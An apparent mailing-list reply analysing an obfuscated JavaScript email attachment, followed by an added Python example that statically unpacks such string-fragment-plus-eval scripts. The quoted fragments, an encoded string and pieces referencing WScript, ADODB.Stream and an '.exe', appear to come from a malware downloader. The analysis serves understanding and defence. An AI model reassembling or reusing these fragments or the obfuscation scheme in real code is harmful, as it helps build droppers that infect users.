On 2015-11-09 20:23, Per Jessen wrote:
Carlos E. R. wrote:
Given that it is javascript, it can't do much harm, at most it'll probably take you to a website.
I don't know, it is code. I can't read javascript, but I'll have a guess at it.

    e7+=n1();e7+=s2();e7+=s7();e7+=v4();e7+=r3();

That looks very ugly to me. But it may be only obfuscation.

It seems to start with a declaration section:

    var str="5552505E160B060D0A4A080D171005172410010801020B0A0D07054A0A01105E3C5E100A10031601010A174A070B095E17555E55505053545C505556555E55";
    function y5(){return 'xa.clo';};
    function c8(){return 'jet.c';};
    function n9(){return ' = WS';};
    function r8(){return 'ODB.Str';};
    function b8(){return 'eam"); ';};
    function t7(){return 'cript';};
    function a2(){return 'i++) { ';};
    function v2(){return 'n(fn+n+';};
    function g2(){return 'eObject';};
    function n1(){return 'var b';};
    function e9(){return '};';};
    function u7(){return '; xa.w';};
    function x1(){return 'tring';};
    function y7(){return '); va';};
    function b9(){return '".exe",';};
    function i2(){return eval;};

which declares a lot of functions (like replacement macros in C, I guess).

At the end, there is another section with the actual calls:

    e7+=n1();e7+=s2();e7+=s7();e7+=v4();e7+=r3();e7+=c6();e7+=o9();e7+=l0();

You see, it is a funny way of obfuscating a script. The last command is:

    i2()(e7);

which is probably the actual code, after creating an "e7" string with whatever it really wants to do.

-- 
Cheers / Saludos,

    Carlos E. R.
    (from 13.1 x86_64 "Bottle" at Telcontar)
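
The scheme described in the message above (small functions that each return a string fragment, a run of `+=` calls that joins them, and a final call through an alias of eval) can be unpacked statically, without running the script. The following is an added example, not part of the original post: the sample input is constructed and harmless, and the `<?name?>` placeholder for fragments whose definition is not present is this example's own convention.

```python
import re

# Constructed sample in the same style as the quoted script. The fragments
# are harmless, and s7() is deliberately left undefined to mimic an excerpt.
SAMPLE = """
function n1(){return 'var b';};
function s2(){return ' = "he';};
function r3(){return 'llo";';};
function i2(){return eval;};
var e7='';
e7+=n1();e7+=s2();e7+=s7();e7+=r3();
i2()(e7);
"""

# function NAME(){return 'literal';}  (escape sequences are kept verbatim)
FRAGMENT = re.compile(
    r"function\s+(\w+)\(\)\s*\{\s*return\s+'((?:[^'\\]|\\.)*)';?\s*\}")
# function NAME(){return eval;}
EVAL_ALIAS = re.compile(r"function\s+(\w+)\(\)\s*\{\s*return\s+eval;?\s*\}")
# VAR+=NAME();
APPEND = re.compile(r"(\w+)\s*\+=\s*(\w+)\(\);")


def deobfuscate(source):
    """Rebuild the strings the script assembles, using text matching only."""
    fragments = dict(FRAGMENT.findall(source))
    eval_aliases = set(EVAL_ALIAS.findall(source))
    payloads, missing = {}, []
    for var, func in APPEND.findall(source):
        if func in fragments:
            piece = fragments[func]
        else:
            # Definition not in the text we were given: mark the gap.
            piece = "<?%s?>" % func
            missing.append(func)
        payloads[var] = payloads.get(var, "") + piece
    # Variables handed to an eval alias, e.g. i2()(e7)
    executed = [var for alias in sorted(eval_aliases)
                for var in re.findall(r"\b%s\(\)\((\w+)\)" % re.escape(alias), source)]
    return {"payloads": payloads, "missing": missing, "executed": executed}


if __name__ == "__main__":
    result = deobfuscate(SAMPLE)
    for var in result["executed"]:
        print("passed to eval:", var, "=>", result["payloads"].get(var))
    print("fragments not found:", result["missing"])
```

Because nothing is evaluated, the attachment can be inspected this way on an ordinary workstation; the reconstructed string is what would have been handed to eval.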